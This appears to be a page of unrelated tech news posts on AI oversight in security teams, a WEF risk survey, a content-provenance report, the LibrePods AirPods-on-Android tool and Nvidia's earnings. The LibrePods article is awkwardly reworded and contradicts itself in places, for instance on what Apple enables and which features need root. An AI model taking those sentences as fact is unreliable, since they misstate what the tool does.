Artificial intelligence is now built into many cybersecurity tools, yet its presence is often hidden. Systems that sort alerts, scan emails, highlight unusual activity, or prioritise vulnerabilities rely on machine learning beneath the surface. These features make work faster, but they rarely explain how their decisions are formed. This creates a challenge for security teams that must rely on the output while still bearing responsibility for the outcome.

Automated systems can recognise patterns, group events, and summarise information, but they cannot understand an organisation’s mission, risk appetite, or ethical guidelines. A model may present a result that is statistically correct yet disconnected from real operational context. This gap between automated reasoning and practical decision-making is why human oversight remains essential.

To manage this, many teams are starting to build or refine small AI-assisted workflows of their own. These lightweight tools do not replace commercial products. Instead, they give analysts a clearer view of how data is processed, what is considered risky, and why certain results appear. Custom workflows also allow professionals to decide what information the system should learn from and how its recommendations should be interpreted. This restores a degree of control in environments where AI often operates silently.

AI can also help remove friction in routine tasks. Analysts often lose time translating a simple question into complex SQL statements, regular expressions, or detailed log queries. AI-based utilities can convert plain language instructions into the correct technical commands, extract relevant logs, and organise the results. When repetitive translation work is reduced, investigators can focus on evaluating evidence and drawing meaningful conclusions.

However, using AI responsibly requires a basic level of technical fluency. Many AI-driven tools rely on Python for integration, automation, and data handling. What once felt intimidating is now more accessible because models can draft most of the code when given a clear instruction. Professionals still need enough understanding to read, adjust, and verify what the model generates. They also need awareness of how AI interprets instructions and where its logic might fail, especially when dealing with vague or incomplete information.

A practical starting point involves a few structured steps. Teams can begin by reviewing their existing tools to see where AI is already active and what decisions it is influencing. Treating AI outputs as suggestions rather than final answers helps reinforce accountability. Choosing one recurring task each week and experimenting with partial automation builds confidence and reduces workload over time. Developing a basic understanding of machine learning concepts makes it easier to anticipate errors and keep automated behaviours aligned with organisational priorities. Finally, engaging with professional communities exposes teams to shared tools, workflows, and insights that accelerate safe adoption.

As AI becomes more common, the goal is not to replace human expertise but to support it. Automated tools can process large datasets and reduce repetitive work, but they cannot interpret context, weigh consequences, or understand the nuance behind security decisions. Cybersecurity remains a field where judgment, experience, and critical thinking matter. When organisations use AI with intention and oversight, it becomes a powerful companion that strengthens investigative speed without compromising professional responsibility.



Global Executives Rank Misinformation, Cyber Insecurity and AI Risks as Top Threats: WEF Survey 2025

 

Business leaders across major global economies are increasingly concerned about the rapid rise of misinformation, cyber threats and the potential negative impacts of artificial intelligence, according to new findings from the World Economic Forum (WEF).

The WEF Executive Opinion Survey 2025, based on responses from 11,000 executives in 116 countries, asked participants to identify the top five risks most likely to affect their nations over the next two years from a list of 34 possible threats.

While economic issues such as inflation and downturns, along with societal challenges like polarization and inadequate public services, remained dominant, technology-driven risks stood out prominently in this year’s results.

Within G20 nations, concerns over AI were especially visible. “Adverse outcomes of AI technologies” emerged as the leading risk in Germany and the fourth most significant in the US. Australian executives similarly flagged “adverse outcomes of frontier technologies,” including quantum innovations, as a top threat.

Misinformation and disinformation ranked as the third-largest concern for executives in the US, UK and Canada. Meanwhile, in India, cyber insecurity—including threats to critical infrastructure—was identified as the number one risk.

Regionally, mis/disinformation ranked second in North America, third in Europe and fourth in East Asia. Cyber insecurity was the third-highest risk in Central Asia, while concerns around harmful AI outcomes placed fourth in South-east Asia.

AI’s influence is clearly woven through most of the technological risks highlighted. The technology is enabling more sophisticated disinformation efforts, including realistic deepfake audio and video. At the same time, AI is heightening cyber risks by empowering threat actors with advanced capabilities in social engineering, reconnaissance, vulnerability analysis and exploit development, according to the UK’s National Cyber Security Centre (NCSC).

The NCSC’s recent threat outlook cautions that AI will “almost certainly” make several stages of cyber intrusion “more effective and efficient” in the next few years.

The survey’s references to “adverse outcomes” of AI also include potential misuse of agentic or generative AI tools and the manipulation of AI models for disruptive, espionage-related or malicious purposes.

A study released in September found that 26% of US and UK organizations experienced a data poisoning attack in the past year, underscoring the growing risks.

“With the rise of AI, the proliferation of misinformation and disinformation is enabling bad actors to operate more broadly,” said Andrew George, president of Marsh Specialty. “As such, the challenges posed by the rapid adoption of AI and associated cyber threats now top boardroom agendas.”

The New Content Provenance Report Will Address GenAI Misinformation


The GenAI problem 

Today's information environment includes a wide range of communication. Social media platforms have enabled reposting, and comments. The platform is useful for both content consumers and creators, but it has its own challenges.

The rapid adoption of Generative AI has led to a significant increase in misleading content online. These chatbots have a tendency of generating false information which has no factual backing. 

What is AI slop?

The internet is filled with AI slop- content that is made with minimal human input and is like junk. There is currently no mechanism to limit such massive production of harmful or misleading content that can impact human cognition and critical thinking. This calls for a robust mechanism that can address the new challenges that the current system is failing to tackle. 

The content provenance report 

For restoring the integrity of digital information, Canada's Centre for Cyber Security (CCCS) and the UK's National Cyber Security Centre (NCSC) have launched a new report on public content provenance. Provenance means "place of origin." For building stronger trust with external audiences, businesses and organisations must improve the way they manage the source of their information.

NSSC chief technology officer said that the "new publication examines the emerging field of content provenance technologies and offers clear insights using a range of cyber security perspectives on how these risks may be managed.” 

What is next for Content Integrity?

The industry is implementing few measures to address content provenance challenges like Coalition for Content Provenance and Authenticity (C2PA). It will benefit from the help of Generative AI and tech giants like Meta, Google, OpenAI, and Microsoft. 

Currently, there is a pressing need for interoperable standards across various media types such as image, video, and text documents. Although there are content provenance technologies, this area is still in nascent stage. 

What is needed?

The main tech includes genuine timestamps and cryptographically-proof meta to prove that the content isn't tampered. But there are still obstacles in development of these secure technologies, like how and when they are executed.

The present technology places the pressure on the end user to understand the provenance data. 

A provenance system must allow a user to see who or what made the content, the time and the edits/changes that were made. Threat actors have started using GenAI media to make scams believable, it has become difficult to differentiate between what is fake and real. Which is why a mechanism that can track the origin and edit history of digital media is needed. The NCSC and CCCS report will help others to navigate this gray area with more clarity.


Indian Teen Enables Apple-Exclusive AirPods Features on Android


 As Apple's AirPods have long been known, they offer a wide range of intelligent features, such as seamless device switching, adaptive noise control, and detailed battery indicators, but only if they are paired with an iPhone. This has left Android users with little more than basic audio functions, despite the fact that they are available to Android users. 


It is now being challenged by an 18-year-old developer from Gurugram, who is regarded as an intentional reinforcement of Apple's closed ecosystem. The latest creation from Kavish Devar, LibrePods, is a significant breakthrough in the field of mobile devices: an open-source, completely free tool designed to replicate the experience of AirPods on Android or even Linux systems with striking accuracy. 

LibrePods removes the limitations previously accepted by Apple that restricted the full potential of AirPods outside Apple's ecosystem, enabling the earbuds to perform almost identically to the way they perform when paired with Apple's iOS devices. With this upgrade, Android users who rely on AirPods will experience a markedly enhanced and seamless user experience, which will include core functionalities, polished integration, and an unexpectedly familiar fluidity that will surprise them. 

The earlier efforts of the community, including OpenPods and MaterialPods, provided limited capabilities, including battery readings, but LibrePods goes a much further than these. With its near-complete control suite, Android users can quickly and easily access the functions normally reserved for Apple devices, effectively narrowing a gap that has existed for many years among Android devices. 

During his high school years, Devar is still a self-taught programmer who developed LibrePods after studying earlier attempts at improving Android users such as OpenPods and MaterialPods, both of whom provided very limited improvements. 

A much more ambitious approach is taken by his project, according to the detailed notes on its GitHub page. As it enables Apple to unlock AirPods' otherwise exclusive features on non-Apple platforms, LibrePods was designed to achieve this purpose. Among the features offered by Apple are noise-control features, adaptive transparency, hearing-assistance functions, ear-detection, personalized transparency settings, and precise battery information, all of which are traditionally exclusive to Apple's ecosystem. 

By making use of an app that emulates the behavior of an authorized Apple endpoint, the app is able to accomplish what it aims to accomplish: Android devices can communicate with AirPods almost exactly as iPhones would if they were connected to an authorized Apple device. 

A full range of features is most effective on the second- and third-generation AirPod Pros that are rooted via the Xposed framework and can be accessed through rooted Android devices. OnePlus and Oppo models running OxygenOS 16 or ColorOS 16 are also able to use LibrePods without rooting, which means Devar has ensured that LibrePods are accessible to a broader range of devices. 

Even though the older models of AirPods are not as customizable as those in the newer generations, they still have the advantage of accurate battery reporting, which makes them a good option for anyone who wants accurate battery data. 

Having these features unlocked will allow users to switch effortlessly between the Noise Cancellation, the Adaptive Audio, and the Transparency modes, rename their earbuds so they can be managed more easily, enable automatic play-and-pause functions, assign long-press actions to toggle ANC or trigger a voice assistant, as well as use head gesture controls to answer calls. This is an entirely new way to experience the AirPods on Android, bringing it to the next level of functionality and convenience. 

A meticulous reverse-engineering effort by Devar enabled AirPods to recognize Android handsets as if they were iPhones or iPads, and enabled them to recognize them as if they were an iPhone or iPad, enabling this level of cross-platform functionality. By using this technical trick, Apple is able to share the status data and advanced controls within the earphones that it typically confines to its own ecosystem. 

LibrePods, however, is not without some conditions, owing to what Devar describes as a persistent limitation in the Android Bluetooth stack, which leads to it currently needing to be connected to a rooted device which runs the Xposed framework, in order to achieve full functionality.

OnePlus and Oppo smartphones running OxygenOS 16 or ColorOS 16 can run the app without rooting, but certain advanced features—such as fine-tuning the Transparency mode adjustments—which require elevated system access are still available to those using these devices. This is a partial exception, but users on OnePlus and Oppo smartphones can still make use of the app without rooting. 

A central priority remains that of ensuring wide compatibility, with support extended across all the AirPods devices, including AirPods Max, the second- and third-generation AirPods Pro, though older models are naturally equipped with a dwindling range of features. The extensive documentation found on the project's GitHub repository may be helpful to those interested in exploring it further, as well as downloading the APK and installing it on their own computers. 

The LibrePods continues to receive widespread attention, and Devar's work reveals a broader shift in how users expect technology to work, namely the ability to choose, be open, and use it in a way that is more useful to them. In addition to restoring functionality lost to Android users who had to settle for a diluted AirPods experience, this project demonstrates the power of community-driven innovation in challenging established norms and challenging established expectations. 

The tool still comes with technical caveats, but its rapid evolution makes it more likely that further refinements will be added in the future. LibrePods, therefore, shows great promise of an improved, more flexible multi-platform audio future, one which is user-centric rather than platform-centric.

Nvidia’s Strong Earnings Ease AI Bubble Fears Despite Market Volatility

 

Nvidia (NVDA) delivered a highly anticipated earnings report, and the AI semiconductor leader lived up to expectations.

“These results and commentary should help steady the ship for the AI trade into the end of the year,” Jefferies analysts wrote in a Thursday note.

The company’s late-Wednesday announcement arrived at a critical moment for the broader AI-driven market rally. Over the past few weeks, debate around whether AI valuations have entered bubble territory has intensified, fueled by concerns over massive data-center investments, the durability of AI infrastructure, and uncertainty around commercial adoption.

Thursday’s market swings showed just how unresolved the conversation remains. The Nasdaq Composite surged more than 2% early in the day, only to reverse course and fall nearly 2% by afternoon. Nvidia shares followed a similar pattern—after climbing 5% in the morning, the stock later slipped almost 3%.

Still, Nvidia’s exceptional performance provided some reassurance to investors worried about overheating in the AI sector.

The company reported that quarterly revenue jumped 62% to $57 billion, with expectations for current-quarter sales to reach $65 billion. Margins also improved, and Nvidia projected gross margins would expand further to nearly 75% in the coming quarter.

“Bubbles are irrational, with prices rising despite weaker fundamentals. Nvidia’s numbers show that fundamentals are still strong,” said David Russell, Global Head of Market Strategy at TradeStation.

Executives also addressed long-standing questions about AI profitability, return on investment, and the useful life of AI infrastructure during the earnings call.

CEO Jensen Huang highlighted the broad scope of industries adopting Nvidia hardware, pointing to Meta’s (META) rising ad conversions as evidence that “transitioning to generative AI represents substantial revenue gains for hyperscalers.”

CFO Colette Kress also reassured investors about hardware longevity, stating, “Thanks to CUDA, the A100 GPUs we shipped six years ago are still running at full utilization today.”
Her remarks appeared to indirectly counter claims from hedge fund manager Michael Burry, who recently suggested that tech firms were extending the assumed lifespan of GPUs to downplay data-center costs.

Most analysts responded positively to the report.

“On these numbers, it is very hard to see how this stock does not keep moving higher from here,” UBS analysts wrote. “Ultimately, the AI infrastructure tide is still rising so fast that all boats will be lifted,” they added.

However, not everyone is convinced that the concerns fueling the AI bubble debate have been resolved.

“The AI bubble debate has never been about whether or not NVIDIA can sell chips,” said Julius Franck, co-founder of Vertus. “Their outstanding results do not address the elephant in the room: will the customers buying all this hardware ever make money from it?”

Others suggested that investor scrutiny may only increase from here.

“Many of the risks now worrying investors, like heavy spending and asset depreciation, are real,” noted TradeStation's Russell. “We may see continued weakness in the shares of companies taking on debt to build data centers, even as the boom continues.”